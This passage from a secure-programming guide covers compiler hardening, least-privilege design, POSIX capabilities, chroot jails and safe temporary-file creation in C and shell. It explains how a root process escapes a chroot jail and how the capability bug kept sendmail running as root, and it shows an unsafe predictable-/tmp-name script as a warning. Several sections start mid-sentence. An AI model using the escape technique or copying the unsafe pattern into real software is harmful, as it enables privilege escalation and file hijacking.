corrupt arbitrary memory locations), and (3) omitting instrumentation code from some functions (it
basically assumes that only character arrays are dangerous; while this isn’t strictly true, it’s mostly true,
and as a result ProPolice has better performance while retaining most of its protective capabilities).
Red Hat engineers in 2005 re-implemented buffer overflow countermeasures in GCC based on lessons
learned from ProPolice. They implemented the GCC -fstack-protector flag (which only protects
some vulnerable functions) and the -fstack-protector-all flag (which protects all functions). In 2012,
Google engineers added the -fstack-protector-strong flag that tries to strike a better balance (it protects
more functions than -fstack-protector, but not all of them as -fstack-protector-all does). Many Linux
distributions use one of these flags, as a default or for at least some packages, to harden application
programs.
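For example, assuming a reasonably recent version of GCC, compiling with one of these flags might look
like the following (the file and program names are illustrative):

gcc -fstack-protector-strong -O2 -o myprogram myprogram.c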
On Windows, Microsoft’s compilers include the /GS option to include StackGuard-like protection
against buffer overflows. However, it’s worth noting that at least on Microsoft Windows 2003 Server
these protection mechanisms can be defeated.
An especially strong hardening approach is "Address Sanitizer" (ASan, also referred to as ASAN and
AddressSanitizer). ASan is available in LLVM and gcc compilers as the "-fsanitize=address" flag. ASan
counters buffer overflow (global/stack/heap), use-after-free, and double-free based attacks. It can also
detect use-after-return and memory leaks, and it counters some other C/C++ memory issues, but due
to its design it cannot detect read-before-write. It has a measured average CPU overhead of 73%
(often a 2x slowdown), with 2x-4x memory overhead; this is low compared to previous approaches, but it is
still significant. Still, this is sometimes acceptable overhead for deployment, and it is typically quite
acceptable for testing including fuzz testing. The development processes for Chromium and Firefox, for
example, use ASan. Details of how ASan works are available at
http://code.google.com/p/address-sanitizer/, particularly in the paper "AddressSanitizer: A Fast Address
Sanity Checker" by Konstantin Serebryany, Derek Bruening, Alexander Potapenko, and Dmitry Vyukov
(Google), USENIX ATC 2012. Fundamentally, ASan uses "shadow bytes" to record memory
addressability. ASan tracks the addressability of memory, where addressability means whether a read or
write is permitted. All memory allocations (global, stack, and heap) are aligned to (at least) 8 bytes, and every 8
bytes of memory’s addressability is represented by a "shadow byte". In a shadow byte, a 0 means all 8
bytes are addressable, a value N in 1..7 means only the first N bytes are addressable, and a negative value (high bit set) means no bytes are
addressable. All allocations are surrounded by inaccessible "red zones" (with a default size of 128 bytes).
Every allocation/deallocation in stack and heap manipulates the shadow bytes, and every read/write first
checks the shadow bytes to see if access is allowed. This countermeasure is very strong, though it can be
fooled if a calculated address is in a different valid region. That said, ASan is a remarkably strong
defense for applications written in C or C++, in cases where these overheads are acceptable.
A "non-executable segment" approach was developed by Ingo Molnar, termed Exec Shield. Molnar’s
exec shield limits the region that executable code can exist, and then moves executable code below that
region. If the code is moved to an area where a zero byte must occur, then it’s harder to exploit because
many ASCII-based attacks cannot insert a zero byte. This isn’t foolproof, but it does prevent certain
attacks. However, many programs invoke libraries that in aggregate are so large that their addresses can
have a non-zero in them, making them much more vulnerable.
A different approach is to limit transfer of control; this doesn’t prevent all buffer overflow attacks (e.g.,
those that attack data) but it can make other attacks harder [Kiriansky 2002].
In short, it’s better to work first on developing a correct program that defends itself against buffer
overflows. Then, after you’ve done this, by all means use techniques and tools like StackGuard as an
additional safety net. If you’ve worked hard to eliminate buffer overflows in the code itself, then
StackGuard (and tools like it) are likely to be more effective because there will be fewer “chinks in
the armor” that StackGuard will be called on to protect.
Chapter 7. Design Your Program for Security
Like a city whose walls are broken down
is a man who lacks self-control.
Proverbs 25:28 (NIV)
Some program designs are relatively easy to secure; others are practically impossible. If you want a
secure application, you’ll need to follow good security design principles. In particular, you should
minimize the privileges your program (and its parts) have, so that the inevitable mistakes are much less
likely to become security vulnerabilities.
• Least privilege. Each user and program should operate using the fewest privileges possible. This
principle limits the damage from an accident, error, or attack. It also reduces the number of potential
interactions among privileged programs, so unintentional, unwanted, or improper uses of privilege are
less likely to occur. This idea can be extended to the internals of a program: only the smallest portion
of the program which needs those privileges should have them. See Section 7.4 for more about how to
do this.
• Economy of mechanism/Simplicity. The protection system’s design should be as simple and small as
possible. In Saltzer and Schroeder’s words, “techniques such as line-by-line inspection of software and physical
examination of hardware that implements protection mechanisms are necessary. For such techniques
to be successful, a small and simple design is essential.” This is sometimes described as the “KISS”
principle (“keep it simple, stupid”).
• Open design. The protection mechanism must not depend on attacker ignorance. Instead, the
mechanism should be public, depending on the secrecy of relatively few (and easily changeable) items
like passwords or private keys. An open design makes extensive public scrutiny possible, and it also
makes it possible for users to convince themselves that the system about to be used is adequate.
Frankly, it isn’t realistic to try to maintain secrecy for a system that is widely distributed; decompilers
and subverted hardware can quickly expose any “secrets” in an implementation. Even if you pretend
that source code is necessary to find exploits (it isn’t), source code has often been stolen and
redistributed (at least once from Cisco and twice from Microsoft). This is one of the oldest and most
strongly supported principles, based on many years of experience in cryptography. For example, the older
Kerckhoffs’s Law states that "A cryptosystem should be designed to be secure if everything is known
about it except the key information." Claude Shannon, the inventor of information theory, restated
Kerckhoffs’s Law as: "[Assume] the enemy knows the system." Indeed, security expert Bruce Schneier
goes further and argues that smart engineers should “demand open source code for anything related to
security”, as well as ensuring that it receives widespread review and that any identified problems are
fixed [Schneier 1999].
• Complete mediation. Every access attempt must be checked; position the mechanism so it cannot be
subverted. A synonym for this goal is non-bypassability. For example, in a client-server model,
generally the server must do all access checking because users can build or modify their own clients.
This is the point of all of Chapter 5, as well as Section 7.2.
• Fail-safe defaults (e.g., permission-based approach). The default should be denial of service, and the
protection scheme should then identify conditions under which access is permitted. See Section 7.7
and Section 7.10 for more.
• Separation of privilege. Ideally, access to objects should depend on more than one condition, so that
defeating one protection system won’t enable complete access.
• Least common mechanism. Minimize the amount and use of shared mechanisms (e.g. use of the /tmp
or /var/tmp directories). Shared objects provide potentially dangerous channels for information flow
and unintended interactions. See Section 7.11 for more information.
• Psychological acceptability / Easy to use. The human interface must be designed for ease of use so
users will routinely and automatically use the protection mechanisms correctly. Mistakes will be
reduced if the security mechanisms closely match the user’s mental image of his or her protection
goals.
A good overview of various design principles for security is available in Peter Neumann’s Principled
Assuredly Trustworthy Composable Architectures. For examples of complete failures to consider these
issues (not limited to information technology), see the "winners" of Privacy International’s "Stupid
Security" Competition.
If you’re using a database system (say, by calling its query interface), limit the rights of the database user
that the application uses. For example, don’t give that user access to all of the system stored procedures if
that user only needs access to a handful of user-defined ones. Do everything you can inside stored
procedures. That way, even if someone does manage to force arbitrary strings into the query, the damage
that can be done is limited. If you must directly pass a regular SQL query with client supplied data (and
you usually shouldn’t), wrap it in something that limits its activities (e.g., sp_sqlexec). (My thanks to SPI
Labs for these database system suggestions).
If you must give a program privileges usually reserved for root, consider using POSIX capabilities so
that your program can minimize the privileges available to it as soon as possible. POSIX capabilities are
available in Linux 2.2 and in many other Unix-like systems. By calling cap_set_proc(3) or the
Linux-specific capsetp(3) routines immediately after starting, you can permanently reduce the abilities of
your program to just those abilities it actually needs. For example the network time daemon (ntpd)
traditionally has run as root, because it needs to modify the current time. However, patches have been
developed so ntpd only needs a single capability, CAP_SYS_TIME, so even if an attacker gains control
over ntpd it’s somewhat more difficult to exploit the program.
I say “somewhat more difficult” because, unless other steps are taken, retaining a privilege using POSIX
capabilities requires that the process continue to have the root user id. Because many important files
(configuration files, binaries, and so on) are owned by root, an attacker controlling a program with such
limited capabilities can still modify key system files and gain full root-level privilege. A Linux kernel
extension (available in versions 2.4.X and 2.2.19+) provides a better way to limit the available privileges:
a program can start as root (with all POSIX capabilities), prune its capabilities down to just what it
needs, call prctl(PR_SET_KEEPCAPS,1), and then use setuid() to change to a non-root process. The
PR_SET_KEEPCAPS setting marks a process so that when a process does a setuid to a nonzero value,
the capabilities aren’t cleared (normally they are cleared). This process setting is cleared on exec().
However, note that PR_SET_KEEPCAPS is a Linux-unique extension for newer versions of the Linux
kernel.
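Here is a hedged sketch of that sequence using the libcap interface (the CAP_SYS_TIME capability and the
target uid/gid are illustrative, and a real program would report errors rather than simply exiting):

#include <sys/capability.h>     /* libcap; link with -lcap */
#include <sys/prctl.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>

void drop_to_sys_time_only(uid_t uid, gid_t gid)
{
    cap_t caps;

    if (prctl(PR_SET_KEEPCAPS, 1) < 0)       /* keep permitted caps across setuid() */
        exit(1);
    if (setgid(gid) < 0 || setuid(uid) < 0)  /* give up the root uid and gid */
        exit(1);
    caps = cap_from_text("cap_sys_time=ep"); /* keep only CAP_SYS_TIME */
    if (caps == NULL || cap_set_proc(caps) < 0)
        exit(1);
    cap_free(caps);
}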
One tool you can use to simplify minimizing granted privileges is the “compartment” tool developed by
SuSE. This tool, which only works on Linux, sets the filesystem root, uid, gid, and/or the capability set,
then runs the given program. This is particularly handy for running some other program without
modifying it. Here’s the syntax of version 0.5:
Options:
--chroot path chroot to path
--user user change UID to this user
--group group change GID to this group
--init program execute this program before doing anything
--cap capset set capset name. You can specify several
--verbose be verbose
--quiet do no logging (to syslog)
Thus, you could start a more secure anonymous ftp server using an invocation along the following lines
(here anon-ftpd stands for whatever ftp server binary you actually use):
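  compartment --chroot /home/ftp --cap CAP_NET_BIND_SERVICE anon-ftpd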
At the time of this writing, the tool is immature and not available on typical Linux distributions, but this
may quickly change. You can download the program via http://www.suse.de/~marc. A similar tool is
dreamland; you can find it at http://www.7ka.mipt.ru/~szh/dreamland.
Note that not all Unix-like systems implement POSIX capabilities, and PR_SET_KEEPCAPS is
currently a Linux-only extension. Thus, these approaches limit portability. However, if you use them
merely as an optional safeguard where available, they will not really limit portability.
Also, while the Linux kernel version 2.2 and greater includes the low-level calls, the C-level libraries to
make their use easy are not installed on some Linux distributions, slightly complicating their use in
applications. For more information on Linux’s implementation of POSIX capabilities, see
http://linux.kernel.org/pub/linux/libs/security/linux-privs.
FreeBSD has the jail() function for limiting privileges; see the jail documentation for more information.
There are a number of specialized tools and extensions for limiting privileges; see Section 3.10.
POSIX "Capabilities" have recently been implemented in the Linux kernel. These "Capabilities" are an
additional form of privilege control to enable more specific control over what privileged processes can do.
Capabilities are implemented as three (fairly large) bitfields, which each bit representing a specific action a
privileged process can perform. By setting specific bits, the actions of privileged processes can be controlled --
access can be granted for various functions only to the specific parts of a program that require them. It is a
security measure. The problem is that capabilities are copied with fork() execs, meaning that if capabilities are
modified by a parent process, they can be carried over. The way that this can be exploited is by setting all of the
capabilities to zero (meaning, all of the bits are off) in each of the three bitfields and then executing a setuid
program that attempts to drop privileges before executing code that could be dangerous if run as root, such as
what sendmail does. When sendmail attempts to drop privileges using setuid(getuid()), it fails not having the
capabilities required to do so in its bitfields and with no checks on its return value . It continues executing with
superuser privileges, and can run a users .forward file as root leading to a complete compromise.
One approach, used by sendmail, is to attempt to do setuid(0) after a setuid(getuid()); normally this
should fail. If it succeeds, the program should stop. For more information, see
http://sendmail.net/?feed=000607linuxbug. In the short term this might be a good idea in other programs,
though clearly the better long-term approach is to upgrade the underlying system.
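In C, that check looks something like this (a sketch, assuming <unistd.h> and <stdlib.h> are included,
that the real uid is not root, and that exiting is an acceptable response to failure):

  if (setuid(getuid()) != 0) {
    exit(1);            /* the privilege drop itself failed; don't continue */
  }
  if (setuid(0) == 0) {
    exit(1);            /* we could become root again - the drop didn't stick */
  }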
needed, one approach is to fork into multiple processes, each of which has different privilege.
Communications channels can be set up in a variety of ways; one way is to have a "master" process
create communication channels (say unnamed pipes or unnamed sockets), then fork into different
processes and have each process drop as many privileges as possible. If you’re doing this, be sure to
watch for deadlocks. Then use a simple protocol to allow the less trusted processes to request actions
from the more trusted process(es), and ensure that the more trusted processes only support a limited set
of requests. Setting user and group permissions so that no one else can even start up the sub-programs
makes them harder to attack.
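Here is a minimal sketch of that structure in C (the uid/gid value 65534 for the "nobody" account, the
one-line request protocol, and the abbreviated error handling are all illustrative assumptions):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

int main(void)
{
  int chan[2];
  pid_t pid;
  char buf[256];
  ssize_t n;

  if (pipe(chan) != 0) { perror("pipe"); exit(1); }

  pid = fork();
  if (pid < 0) { perror("fork"); exit(1); }

  if (pid == 0) {                     /* less-trusted child */
    close(chan[0]);                   /* the child only writes requests */
    if (setgid(65534) != 0 || setuid(65534) != 0) _exit(1);
    write(chan[1], "REQUEST action\n", 15);   /* simple fixed protocol */
    _exit(0);
  }

  /* More-trusted parent: read requests and honor only a limited set. */
  close(chan[1]);
  n = read(chan[0], buf, sizeof(buf) - 1);
  if (n > 0) {
    buf[n] = '\0';
    if (strcmp(buf, "REQUEST action\n") == 0) {
      /* perform the single allowed privileged action here */
    }
  }
  waitpid(pid, NULL, 0);
  return 0;
}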
Some operating systems have the concept of multiple layers of trust in a single process, e.g., Multics’
rings. Standard Unix and Linux don’t have a way of separating multiple levels of trust by function inside
a single process like this; a call to the kernel increases privileges, but otherwise a given process has a
single level of trust. This is one area where technologies like Java 2, C# (which copies Java’s approach),
and Fluke (the basis of security-enhanced Linux) have an advantage. For example, Java 2 can specify
fine-grained permissions such as the permission to only open a specific file. However, general-purpose
operating systems do not typically have such abilities at this time; this may change in the near future. For
more about Java, see Section 10.6.
• The program can still use non-filesystem objects that are shared across the entire machine (such as
System V IPC objects and network sockets). It’s best to also use separate pseudo-users and/or groups,
because all Unix-like systems include the ability to isolate users; this will at least limit the damage a
subverted program can do to other programs. Note that most current Unix-like systems (including
Linux) won't isolate intentionally cooperating programs; if you're worried about malicious programs
cooperating, you need to get a system that implements some sort of mandatory access control and/or
limits covert channels.
• Be sure to close any filesystem descriptors to outside files if you don’t want them used later. In
particular, don’t have any descriptors open to directories outside the chroot jail, or set up a situation
where such a descriptor could be given to it (e.g., via Unix sockets or an old implementation of /proc).
If the program is given a descriptor to a directory outside the chroot jail, it could be used to escape out
of the chroot jail.
• The chroot jail has to be set up to be secure - it must never be controlled by a user and every file added
must be carefully examined. Don’t use a normal user’s home directory, subdirectory, or other directory
that can ever be controlled by a user as a chroot jail; use a separate directory specially set
aside for the purpose. Using a directory controlled by a user is a disaster - for example, the user could
create a “lib” directory containing a trojaned linker or libc (and could link a setuid root binary into that
space, if the files you save don’t use it). Place the absolute minimum number of files and directories
there. Typically you’ll have a /bin, /etc/, /lib, and maybe one or two others (e.g., /pub if it’s an ftp
server). Place in /bin only what you need to run after doing the chroot(); sometimes you need nothing
at all (try to avoid placing a shell like /bin/sh there, though sometimes that can’t be helped). You may
need a /etc/passwd and /etc/group so file listings can show some correct names, but if so, try not to
include the real system’s values, and certainly replace all passwords with "*".
You need to ensure that either the program running has all the executable code (including libraries), or
that the chroot jail has the code you’ll need. You should place only what you need into the chroot jail.
You could recompile any necessary programs to be statically linked, so that they don’t need
dynamically loaded libraries at all. If you use dynamically-loaded libraries, include only the ones you
need; use ldd(1) to query each program in /bin to find out what it needs (typically they go in /lib or
/usr/lib). On Linux, you’ll probably need a few basic libraries like ld-linux.so.2, and in some
circumstances not much else. You can also use LD_PRELOAD to force some libraries into an
executable’s area, which can help sometimes. A longer discussion on how to use chroot jails is given
in Marc Balmer’s "Using OpenBSDs chrooted httpd". Balmer’s paper is specifically about using
Apache in a chroot jail, but the approaches he discusses can be applied elsewhere too.
It’s usually wiser to completely copy in all files, instead of making hard links; while this wastes some
time and disk space, it makes it so that attacks on the chroot jail files do not automatically propagate
into the regular system’s files. Mounting a /proc filesystem, on systems where this is supported, is
generally unwise. In fact, in very old versions of Linux (versions 2.0.x, at least up through 2.0.38) it’s a
known security flaw, since there are pseudo-directories in /proc that would permit a chroot’ed program
to escape. Linux kernel 2.2 fixed this known problem, but there may be others; if possible, don’t do it.
• Chroot really isn’t effective if the program can acquire root privilege. For example, the program could
use calls like mknod(2) to create a device file that can view physical memory, and then use the
resulting device file to modify kernel memory to give itself whatever privileges it desired. Another
example of how a root program can break out of chroot is demonstrated at
http://www.suid.edu/source/breakchroot.c. In this example, the program opens a file descriptor for the
current directory, creates and chroots into a subdirectory, sets the current directory to the
previously-opened current directory, repeatedly cd’s up from the current directory (which since it is
outside the current chroot succeeds in moving up to the real filesystem root), and then calls chroot on
the result. By the time you read this, these weaknesses may have been plugged, but the reality is that
root privilege has traditionally meant “all privileges” and it’s hard to strip them away. It’s better to
assume that a program requiring continuous root privileges will only be mildly helped using chroot().
Of course, you may be able to break your program into parts, so that at least part of it can be in a
chroot jail.
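To make these precautions concrete, here is a minimal sketch in C of entering a chroot jail correctly (the
jail path and the uid/gid values are illustrative; note the chdir() before chroot() and the immediate,
permanent drop of root privileges afterwards):

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Enter the jail, then permanently give up root so that the root-only
 * escape tricks (mknod, re-chroot, and so on) are unavailable. */
static void enter_jail(const char *jail, uid_t uid, gid_t gid)
{
  if (chdir(jail) != 0)  { perror("chdir");  exit(1); }
  if (chroot(jail) != 0) { perror("chroot"); exit(1); }
  if (setgid(gid) != 0)  { perror("setgid"); exit(1); }
  if (setuid(uid) != 0)  { perror("setuid"); exit(1); }
  /* From here on, "/" refers to the jail and the process is unprivileged. */
}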
you carefully filter it as an untrusted (potentially hostile) input. Trusted configuration values should be
loaded from somewhere else entirely (typically from a file in /etc).
• Interference caused by untrusted processes. Some security taxonomies call this problem a “sequence”
or “non-atomic” condition. These are conditions caused by processes running other, different
programs, which “slip in” other actions between steps of the secure program. These other programs
might be invoked by an attacker specifically to cause the problem. This book will call these
sequencing problems.
• Interference caused by trusted processes (from the secure program’s point of view). Some taxonomies
call these deadlock, livelock, or locking failure conditions. These are conditions caused by processes
running the “same” program. Since these different processes may have the “same” privileges, if not
properly controlled they may be able to interfere with each other in a way other programs can’t.
Sometimes this kind of interference can be exploited. This book will call these locking problems.
attacker could create an "old" file, arrange for the tmp cleaner to plan to delete the file, delete the file
himself, and run a secure program that creates the same file - now the tmp cleaner will delete the secure
program's file! Or, imagine that a secure program has long delays between uses of the file (e.g., a setuid
program stopped with SIGSTOP and resumed after many days with SIGCONT, or one intentionally given
a lot of work to slow it down). If the program doesn't use its temporary file for long enough, the tmp
cleaner is likely to remove it.
The general problem when creating files in these shared directories is that you must guarantee that the
filename you plan to use doesn’t already exist at time of creation, and atomically create the file.
Checking “before” you create the file doesn’t work, because after the check occurs, but before creation,
another process can create that file with that filename. Using an “unpredictable” or “unique” filename
doesn’t work in general, because another process can often repeatedly guess until it succeeds. Once you
create the file atomically, you must always use the returned file descriptor (or file stream, if created from
the file descriptor using routines like fdopen()). You must never re-open the file, or use any operations
that use the filename as a parameter - always use the file descriptor or associated stream. Otherwise, the
tmpwatch race issues noted above will cause problems. You can’t even create the file, close it, and
re-open it, even if the permissions limit who can open it. Note that comparing the descriptor and a
reopened file to verify inode numbers, creation times or file ownership is not sufficient - please refer to
"Symlinks and Cryogenic Sleep" by Olaf Kirch.
Fundamentally, to create a temporary file in a shared (sticky) directory, you must repetitively: (1) create a
“random” filename, (2) open it using O_CREAT | O_EXCL and very narrow permissions (which
atomically creates the file and fails if it’s not created), and (3) stop repeating when the open succeeds.
According to the 1997 “Single Unix Specification”, the preferred method for creating an arbitrary
temporary file (using the C interface) is tmpfile(3). The tmpfile(3) function creates a temporary file and
opens a corresponding stream, returning that stream (or NULL if it didn’t). Unfortunately, the
specification doesn’t make any guarantees that the file will be created securely. In earlier versions of this
book, I stated that I was concerned because I could not assure myself that all implementations do this
securely. I’ve since found that older System V systems have an insecure implementation of tmpfile(3) (as
well as insecure implementations of tmpnam(3) and tempnam(3)), so on at least some systems it’s
absolutely useless. Library implementations of tmpfile(3) should securely create such files, of course, but
users don’t always realize that their system libraries have this security flaw, and sometimes they can’t do
anything about it.
Kris Kennaway recommends using mkstemp(3) for making temporary files in general. His rationale is
that you should use well-known library functions to perform this task instead of rolling your own
functions, and that this function has well-known semantics. This is certainly a reasonable position. I
would add that, if you use mkstemp(3), be sure to use umask(2) to limit the resulting temporary file
permissions to only the owner. This is because some implementations of mkstemp(3) (basically older
ones) make such files readable and writable by all, creating a condition in which an attacker can read or
write private data in this directory. A minor nuisance is that mkstemp(3) doesn’t directly support the
environment variables TMP or TMPDIR (as discussed below), so if you want to support them you have
to add code to do so. Here’s a program in C that demonstrates how to use mkstemp(3) for this purpose,
both directly and when adding support for TMP and TMPDIR:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
void failure(const char *msg) {
  fprintf(stderr, "%s\n", msg);
  exit(1);
}
/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routine unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */
/* Implementation sketch of the routine described above: create the file
 * with mkstemp(3) under a restrictive umask, turn the descriptor into a
 * stream, and unlink the name so only the stream refers to the file. */
FILE *create_tempfile(char *temp_filename_pattern)
{
  int temp_fd;
  mode_t old_mode;
  FILE *temp_file;

  old_mode = umask(077);      /* create the file with restrictive permissions */
  temp_fd = mkstemp(temp_filename_pattern);
  (void) umask(old_mode);
  if (temp_fd == -1) {
    failure("Couldn't open temporary file");
  }
  if (!(temp_file = fdopen(temp_fd, "w+b"))) {
    failure("Couldn't create temporary file's file descriptor");
  }
  if (unlink(temp_filename_pattern) == -1) {
    failure("Couldn't unlink temporary file");
  }
  return temp_file;
}

/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag. The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp. Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
  char *tmpdir = NULL;
  char *pattern;
  FILE *result;
  /* Use TMPDIR or TMP only if we aren't setuid/setgid (see the comment
   * above); otherwise fall back to /tmp. */
  if ((getuid() == geteuid()) && (getgid() == getegid())) {
    if (!(tmpdir = getenv("TMPDIR"))) {
      tmpdir = getenv("TMP");
    }
  }
  if (!tmpdir) tmpdir = "/tmp";

  pattern = malloc(strlen(tmpdir) + strlen(tag) + 2);
  if (!pattern) {
    failure("Could not malloc tempfile pattern");
  }
  strcpy(pattern, tmpdir);
  strcat(pattern, "/");
  strcat(pattern, tag);
  result = create_tempfile(pattern);
  free(pattern);
  return result;
}
int main(void) {
  int c;
  FILE *demo_temp_file1;
  FILE *demo_temp_file2;
  char demo_temp_filename1[] = "/tmp/demoXXXXXX";
  char demo_temp_filename2[] = "second-demoXXXXXX";

  demo_temp_file1 = create_tempfile(demo_temp_filename1);
  demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
  fprintf(demo_temp_file2, "This is a test.\n");
  printf("Printing temporary file contents:\n");
  rewind(demo_temp_file2);
  while ((c = fgetc(demo_temp_file2)) != EOF) {
    putchar(c);
  }
  putchar('\n');
  printf("Exiting; you'll notice that there are no temporary files on exit.\n");
  return 0;
}
Kennaway states that if you can’t use mkstemp(3), then make yourself a directory using mkdtemp(3),
which is protected from the outside world. However, as Michal Zalewski notes, this is a bad idea if there
are tmp cleaners in use; instead, use a directory inside the user’s HOME. Finally, if you really have to use
the insecure mktemp(3), use lots of X’s - he suggests 10 (if your libc allows it) so that the filename can’t
easily be guessed (using only 6 X’s means that 5 are taken up by the PID, leaving only one random
character and allowing an attacker to mount an easy race condition). Note that this is fundamentally
insecure, so you should normally not do this. I add that you should avoid tmpnam(3) as well - some of its
uses aren’t reliable when threads are present, and it doesn’t guarantee that it will work correctly after
TMP_MAX uses (yet most practical uses must be inside a loop).
In general, you should avoid using the insecure functions such as mktemp(3) or tmpnam(3), unless you
take specific measures to counter their insecurities or test for a secure library implementation as part of
your installation routines. If you ever want to make a file in /tmp or a world-writable directory (or
group-writable, if you don’t trust the group) and don’t want to use mk*temp() (e.g. you intend for the file
to be predictably named), then always use the O_CREAT and O_EXCL flags to open() and check the
return value. If you fail the open() call, then recover gracefully (e.g. exit).
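For instance (a sketch, assuming <fcntl.h>, <stdio.h>, and <stdlib.h> are included; the filename and
the decision to simply exit are illustrative):

  /* Atomically create a predictably-named file; refuse to continue if the
   * name already exists - it might be an attacker's file or symlink. */
  int fd = open("/tmp/myapp.state", O_CREAT | O_EXCL | O_WRONLY, 0600);
  if (fd < 0) {
    perror("open");
    exit(1);                /* recover gracefully; here we just exit */
  }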
The GNOME programming guidelines recommend the following C code when creating filesystem
objects in shared (temporary) directories to securely open temporary files [Quintero 2000]:
  char *filename;
  int fd;

  do {
    filename = tempnam (NULL, "foo");
    fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
    free (filename);
  } while (fd == -1);
Note that, although the insecure function tempnam(3) is being used, it is wrapped inside a loop using
O_CREAT and O_EXCL to counteract its security weaknesses, so this use is okay. Note that you need to
free() the filename. You should close() and unlink() the file after you are done. If you want to use the
Standard C I/O library, you can use fdopen() with mode "w+b" to transform the file descriptor into a
FILE *. Note that this approach won’t work over NFS version 2 (v2) systems, because older NFS doesn’t
correctly support O_EXCL. Note that one minor disadvantage to this approach is that, since tempnam
can be used insecurely, various compilers and security scanners may give you spurious warnings about
its use. This isn’t a problem with mkstemp(3).
If you need a temporary file in a shell script, you’re probably best off using pipes, using a local directory
(e.g., something inside the user’s home directory), or in some cases using the current directory. That way,
there’s no sharing unless the user permits it. If you really want/need the temporary file to be in a shared
directory like /tmp, do not use the traditional shell technique of using the process id in a template and
just creating the file using normal operations like ">". Shell scripts can use "$$" to indicate the PID, but
the PID can be easily determined or guessed by an attacker, who can then pre-create files or links with
the same name. Thus a "typical" shell script along the following lines is unsafe:
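  TMPFILE=/tmp/test$$                  # predictable name, based only on the PID
  echo "This is a test" > $TMPFILE     # DON'T DO THIS - an attacker may have pre-created the name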
If you need a temporary file or directory in a shell script, and you want it in /tmp, a solution sometimes
suggested is to use mktemp(1), which is intended for use in shell scripts (note that mktemp(1) and
mktemp(3) are different things). However, as Michal Zalewski notes, this is insecure in many
environments that run tmp cleaners; the problem is that when a privileged program sweeps through a
temporary directory, it will probably expose a race condition. Even if this weren’t true, I do not
recommend using shell scripts that create temporary files in shared directories; creating such files in
private directories or using pipes instead is generally preferable, even if you’re sure your tmpwatch
program is okay (or that you have no local users). If you must use mktemp(1), note that mktemp(1) takes
a template, then creates a file or directory using O_EXCL and returns the resulting name; thus,
mktemp(1) won’t work on NFS version 2 filesystems. Here are some examples of correct use of
mktemp(1) in Bourne shell scripts; these examples are straight from the mktemp(1) man page:
TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
if [ $? -ne 0 ]; then
  echo "$0: Can't create temp file, exiting..."
  exit 1
fi
Perl programmers should use File::Temp, which tries to provide a cross-platform means of securely
creating temporary files. However, read the documentation carefully on how to use it properly first; it
includes interfaces to unsafe functions as well. I suggest explicitly setting its safe_level to HIGH; this
will invoke additional security checks. The Perl 5.8 documentation of File::Temp is available on-line.
Don’t reuse a temporary filename (i.e. remove and recreate it), no matter how you obtained the “secure”
temporary filename in the first place. An attacker can observe the original filename and hijack it before
you recreate it the second time. And of course, always use appropriate file permissions. For example,
only allow world/group access if you need the world or a group to access the file, otherwise keep it mode
0600 (i.e., only the owner can read or write it).
Clean up after yourself, either by using an exit handler, or making use of UNIX filesystem semantics and
unlink()ing the file immediately after creation so the directory entry goes away but the file itself remains
accessible until the last file descriptor pointing to it is closed. You can then continue to access it within
your program by passing around the file descriptor. Unlinking the file has a lot of advantages for code
maintenance: the file is automatically deleted, no matter how your program crashes. It also decreases the
likelihood that a maintainer will insecurely use the filename (they need to use the file descriptor instead).
The one minor problem with immediate unlinking is that it makes it slightly harder for administrators to
see how disk space is being used, since they can’t simply look at the file system by name.
You might consider ensuring that your code for Unix-like systems respects the environment variables
TMP or TMPDIR if the provider of these variable values is trusted. By doing so, you make it possible for
users to move their temporary files into an unshared directory (eliminating the problems discussed
here), such as a subdirectory inside their home directory. Recent versions of Bastille can set these
variables to reduce the sharing between users. Unfortunately, many users set TMP or TMPDIR to a
shared directory (say /tmp), so your secure program must still correctly create temporary files even if
these environment variables are set. This is one advantage of the GNOME approach, since at least on
some systems tempnam(3) automatically uses TMPDIR, while the mkstemp(3) approach requires more
code to do this. Please don’t create yet more environment variables for temporary directories (such as
TEMP), and in particular don’t create a different environment name for each application (e.g., don’t use
"MYAPP_TEMP"). Doing so greatly complicates managing systems, and users wanting a special
temporary directory for a specific application can just set the environment variable specially when
running that particular application. Of course, if these environment variables might have been set by an
untrusted source, you should ignore them - which you’ll do anyway if you follow the advice in Section
5.4.3.
These techniques don’t work if the temporary directory is remotely mounted using NFS version 2
(NFSv2), because NFSv2 doesn’t properly support O_EXCL. See Section 7.11.2.1 for more information.
NFS version 3 and later properly support O_EXCL; the simple solution is to ensure that temporary
directories are either local or, if mounted using NFS, mounted using NFS version 3 or later. There is a
technique for safely creating temporary files on NFS v2, involving the use of link(2) and stat(2), but it’s
complex; see Section 7.11.2.1 which has more information about this.
As an aside, it’s worth noting that FreeBSD has recently changed the mk*temp() family to get rid of the
PID component of the filename and replace the entire thing with base-62 encoded randomness. This
drastically raises the number of possible temporary files for the "default" usage of 6 X’s, meaning that
even mktemp(3) with 6 X’s is reasonably (probabilistically) secure against guessing, except under very
frequent usage. However, if you also follow the guidance here, you’ll eliminate the problem they’re
addressing.
Much of this information on temporary files was derived from Kris Kennaway’s posting to Bugtraq about
temporary files on December 15, 2000.
I should note that the Openwall Linux patch from http://www.openwall.com/linux/ includes an optional
“temporary file directory” policy that counters many temporary file based attacks. The Linux Security
Module (LSM) project includes an "owlsm" module that implements some of the OpenWall ideas, so
Linux Kernels with LSM can quickly insert these rules into a running system. When enabled, it has two
protections:
• Hard links: Processes may not make hard links to files in certain cases. The OpenWall documentation
states that “Processes may not make hard links to files they do not have write access to.” In the LSM
version, the rules are as follows: if both the process' uid and fsuid (usually the same as the euid) are
different from the linked-to-file's uid, the process uid is not root, and the process lacks the FOWNER
